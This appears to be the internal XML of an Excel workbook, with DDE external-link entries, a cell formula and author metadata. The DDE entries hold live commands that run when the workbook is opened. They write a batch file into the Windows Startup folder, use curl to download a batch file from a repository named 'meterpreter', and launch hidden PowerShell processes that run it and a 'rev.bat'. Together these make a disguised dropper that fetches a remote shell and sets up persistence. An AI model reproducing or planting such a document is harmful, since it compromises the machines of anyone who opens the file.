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46FAF44-7D18-4BA8-B47F-E24735E59E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@echo off &gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.bat&quot;">
    <ddeItems>
      <ddeItem name="nm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise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powershell -WindowStyle Hidden -Command &quot;Start-Process -FilePath \&quot;%temp%\nihbtdtdow.bat\&quot; -WindowStyle Hidden&quot; &gt;&gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.bat&quot; ">
    <ddeItems>
      <ddeItem name="nm.A1" advise="1"/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powershell -c &quot;Start-Process -FilePath &quot;%temp%\rev.bat&quot; -WindowStyle Hidden&quot; &gt;&gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.bat&quot; ">
    <ddeItems>
      <ddeItem name="nm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/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curl https://raw.githubusercontent.com/0x2034/meterpreter/main/nihbtdtdow.bat -o &quot;%temp%\nihbtdtdow.bat&quot; &gt;&gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.bat&quot;">
    <ddeItems>
      <ddeItem name="nm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </dd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powershell -WindowStyle Hidden -Command &quot;Start-Process -FilePath \&quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.bat\&quot; -WindowStyle Hidden&quot;">
    <ddeItems>
      <ddeItem name="nm.A1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s="1" t="e" cm="1">
        <f t="array" ref="A1">[1]!nm.A1&amp;[4]!nm.A1&amp;[2]!nm.A1&amp;[3]!nm.A1&amp;[5]!nm.A1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Samy</dc:creator>
  <cp:lastModifiedBy>Omar Samy</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-27T16:14:30Z</dcterms:modified>
</cp:coreProperties>
</file>